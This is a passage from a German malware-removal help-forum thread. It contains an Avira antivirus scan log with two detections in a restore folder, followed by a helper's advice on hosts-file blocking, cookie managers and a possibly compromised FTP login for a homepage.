VBASE025.VDF   : 7.11.78.207   147456 Bytes  16.05.2013 20:11:40
VBASE026.VDF   : 7.11.79.17    198656 Bytes  17.05.2013 20:11:40
VBASE027.VDF   : 7.11.79.194   659968 Bytes  23.05.2013 16:04:03
VBASE028.VDF   : 7.11.80.1     288256 Bytes  25.05.2013 16:03:38
VBASE029.VDF   : 7.11.80.2       2048 Bytes  25.05.2013 16:03:38
VBASE030.VDF   : 7.11.80.3       2048 Bytes  25.05.2013 16:03:38
VBASE031.VDF   : 7.11.80.30    142848 Bytes  26.05.2013 16:03:39
Engineversion  : 8.2.12.48 
AEVDF.DLL      : 8.1.2.10      102772 Bytes  10.07.2012 16:00:06
AESCRIPT.DLL   : 8.1.4.118     487805 Bytes  23.05.2013 16:04:09
AESCN.DLL      : 8.1.10.4      131446 Bytes  26.03.2013 17:22:16
AESBX.DLL      : 8.2.5.12      606578 Bytes  14.06.2012 18:09:25
AERDL.DLL      : 8.2.0.88      643444 Bytes  11.01.2013 16:25:25
AEPACK.DLL     : 8.3.2.12      754040 Bytes  08.05.2013 16:19:03
AEOFFICE.DLL   : 8.1.2.56      205180 Bytes  08.03.2013 13:12:05
AEHEUR.DLL     : 8.1.4.378    5910905 Bytes  23.05.2013 16:04:09
AEHELP.DLL     : 8.1.25.10     258425 Bytes  08.05.2013 16:18:58
AEGEN.DLL      : 8.1.7.4       442741 Bytes  08.05.2013 16:18:58
AEEXP.DLL      : 8.4.0.32      201078 Bytes  23.05.2013 16:04:09
AEEMU.DLL      : 8.1.3.2       393587 Bytes  10.07.2012 16:00:05
AECORE.DLL     : 8.1.31.2      201080 Bytes  19.02.2013 14:18:12
AEBB.DLL       : 8.1.1.4        53619 Bytes  05.11.2012 19:34:00
AVWINLL.DLL    : 12.3.0.15      27344 Bytes  08.05.2012 19:08:27
AVPREF.DLL     : 12.3.0.32      50720 Bytes  14.11.2012 16:46:07
AVREP.DLL      : 12.3.0.15     179208 Bytes  08.05.2012 19:08:27
AVARKT.DLL     : 12.3.0.33     209696 Bytes  14.11.2012 16:46:07
AVEVTLOG.DLL   : 12.3.0.15     169168 Bytes  08.05.2012 19:08:27
SQLITE3.DLL    : 3.7.0.1       398288 Bytes  08.05.2012 19:08:27
AVSMTP.DLL     : 12.3.0.32      63480 Bytes  08.08.2012 15:47:08
NETNT.DLL      : 12.3.0.15      17104 Bytes  08.05.2012 19:08:27
RCIMAGE.DLL    : 12.3.0.31    4444408 Bytes  08.08.2012 15:47:04
RCTEXT.DLL     : 12.3.0.32      98848 Bytes  14.11.2012 16:46:06

Konfiguration für den aktuellen Suchlauf:
Job Name..............................: AVGuardAsyncScan
Konfigurationsdatei...................: C:\ProgramData\Avira\AntiVir Desktop\TEMP\AVGUARD_51a20083\guard_slideup.avp
Protokollierung.......................: standard
Primäre Aktion........................: interaktiv
Sekundäre Aktion......................: quarantäne
Durchsuche Masterbootsektoren.........: ein
Durchsuche Bootsektoren...............: aus
Durchsuche aktive Programme...........: ein
Durchsuche Registrierung..............: aus
Suche nach Rootkits...................: ein
Integritätsprüfung von Systemdateien..: ein
Datei Suchmodus.......................: Alle Dateien
Durchsuche Archive....................: ein
Rekursionstiefe einschränken..........: 20
Archiv Smart Extensions...............: ein
Abweichende Archivtypen...............: +BSD Mailbox, +Netscape/Mozilla Mailbox, +Eudora Mailbox, +Pegasus Mailbox, +Squid cache, +MS Outlook Mailbox, +ISO 9660, +Windows Imaging File (WIM), 
Makrovirenheuristik...................: ein
Dateiheuristik........................: vollständig
Abweichende Gefahrenkategorien........: +APPL,+GAME,+JOKE,+PCK,+SPR,

Beginn des Suchlaufs: Sonntag, 26. Mai 2013  20:17

Der Suchlauf nach versteckten Objekten wird begonnen.

Der Suchlauf über gestartete Prozesse wird begonnen:
Durchsuche Prozess 'avcenter.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'vssvc.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avscan.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'mbam.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'armsvc.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'OSPPSVC.EXE' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'DllHost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'SynTPHelper.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'SynTPEnh.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'quickset.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avgnt.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'Explorer.EXE' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'Dwm.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'taskhost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'wmiprvse.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'wmpnetwk.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'nvvsvc.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'conhost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avshadow.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'WLIDSvcM.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'WLIDSVC.EXE' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'NLSSRV32.EXE' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'hasplms.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'avguard.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'sched.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'spoolsv.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'nvvsvc.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'winlogon.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'lsm.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'lsass.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'services.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'csrss.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'wininit.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'csrss.exe' - '1' Modul(e) wurden durchsucht
Durchsuche Prozess 'smss.exe' - '1' Modul(e) wurden durchsucht

Untersuchung der Systemdateien wird begonnen:
Signiert -> 'C:\Windows\system32\svchost.exe'
Signiert -> 'C:\Windows\system32\winlogon.exe'
Signiert -> 'C:\Windows\system32\smss.exe'
Signiert -> 'C:\Windows\system32\wininet.DLL'
Signiert -> 'C:\Windows\system32\wsock32.DLL'
Signiert -> 'C:\Windows\system32\ws2_32.DLL'
Signiert -> 'C:\Windows\system32\services.exe'
Signiert -> 'C:\Windows\system32\lsass.exe'
Signiert -> 'C:\Windows\system32\csrss.exe'
Signiert -> 'C:\Windows\system32\drivers\kbdclass.sys'
Signiert -> 'C:\Windows\system32\spoolsv.exe'
Signiert -> 'C:\Windows\system32\alg.exe'
Signiert -> 'C:\Windows\system32\wuauclt.exe'
Signiert -> 'C:\Windows\system32\advapi32.DLL'
Signiert -> 'C:\Windows\system32\user32.DLL'
Signiert -> 'C:\Windows\system32\gdi32.DLL'
Signiert -> 'C:\Windows\system32\kernel32.DLL'
Signiert -> 'C:\Windows\system32\ntdll.DLL'
Signiert -> 'C:\Windows\system32\ntoskrnl.exe'
Signiert -> 'C:\Windows\system32\ctfmon.exe'
Die Systemdateien wurden durchsucht ('20' Dateien)

Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'E:\System Volume Information\_restore{7674160D-C371-402E-8C83-D0EA98B6A103}\RP390\A0095018.exe'
E:\System Volume Information\_restore{7674160D-C371-402E-8C83-D0EA98B6A103}\RP390\A0095018.exe
  [FUND]      Enthält Erkennungsmuster des SPR/Homac-Programmes
Beginne mit der Suche in 'E:\System Volume Information\_restore{7674160D-C371-402E-8C83-D0EA98B6A103}\RP390\A0095019.bat'
E:\System Volume Information\_restore{7674160D-C371-402E-8C83-D0EA98B6A103}\RP390\A0095019.bat
  [FUND]      Enthält Erkennungsmuster des Batch-Virus BAT/Flood.C

Beginne mit der Desinfektion:
E:\System Volume Information\_restore{7674160D-C371-402E-8C83-D0EA98B6A103}\RP390\A0095019.bat
  [FUND]      Enthält Erkennungsmuster des Batch-Virus BAT/Flood.C
  [WARNUNG]   Die Datei wurde ignoriert.
E:\System Volume Information\_restore{7674160D-C371-402E-8C83-D0EA98B6A103}\RP390\A0095018.exe
  [FUND]      Enthält Erkennungsmuster des SPR/Homac-Programmes
  [WARNUNG]   Die Datei wurde ignoriert.


Ende des Suchlaufs: Sonntag, 26. Mai 2013  20:18
Benötigte Zeit: 00:12 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

      0 Verzeichnisse wurden überprüft
     51 Dateien wurden geprüft
      2 Viren bzw. unerwünschte Programme wurden gefunden
      0 Dateien wurden als verdächtig eingestuft
      0 Dateien wurden gelöscht
      0 Viren bzw. unerwünschte Programme wurden repariert
      0 Dateien wurden in die Quarantäne verschoben
      0 Dateien wurden umbenannt
      0 Dateien konnten nicht durchsucht werden
     49 Dateien ohne Befall
      0 Archive wurden durchsucht
      2 Warnungen
      0 Hinweise
  32176 Objekte wurden beim Rootkitscan durchsucht
      0 Versteckte Objekte wurden gefunden


Die Suchergebnisse werden an den Guard übermittelt.

cosinus · 26.05.2013, 19:38

Nur ein Fund in der SWH. Sieht soweit ok aus

Wegen Cookies und anderer Dinge im Web: Um die Pest von vornherein zu blocken (also TrackingCookies, Werbebanner etc.) müsstest du dir mal sowas wie MVPS Hosts File anschauen => Blocking Unwanted Parasites with a Hosts File - sinnvollerweise solltest du alle 4 Wochen mal bei MVPS nachsehen, ob er eine neue Hosts Datei herausgebracht hat.

Info: Cookies sind keine Schädlinge direkt, aber es besteht die Gefahr der missbräuchlichen Verwendung (eindeutige Wiedererkennung zB für gezielte Werbung o.ä. => HTTP-Cookie )

Ansonsten gibt es noch gute Cookiemanager, Erweiterungen für den Firefox zB wäre da CookieCuller
Wenn du aber damit leben kannst, dich bei jeder Browsersession überall neu einzuloggen (zB Facebook, Ebay, GMX, oder auch Trojaner-Board) dann stell den Browser einfach so ein, dass einfach alles beim Beenden des Browser inkl. Cookies gelöscht wird.

Ist dein System nun wieder in Ordnung oder gibt's noch andere Funde oder Probleme?

MA2413 · 26.05.2013, 19:46

Ja, ich habe 1 Minute vor deinem Posting meines noch ergänzt, nicht das dir das vielleicht entgangen ist.

- Was ist die SWH und soll ich Malewarebytes den Fund entfernen lassen?
- Kannst du mir einen Cookie-Manager für Opera empfehlen?

24.05.2013, 18:44	#2
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	Avira hat "HTML/Infected.WebPage.Gen3" auf meiner Homepage gefunden Hallo, ich sehe du verwendest offensichtlich FileZilla um die Daten auf deine HP hochzuladen, ist das richtig? Wenn ja, hast du die Logindaten inkl. Passwort dazu in FileZilla gespeichert? __________________ __________________

Avira hat "HTML/Infected.WebPage.Gen3" auf meiner Homepage gefunden

Log-Analyse und Auswertung: Avira hat "HTML/Infected.WebPage.Gen3" auf meiner Homepage gefunden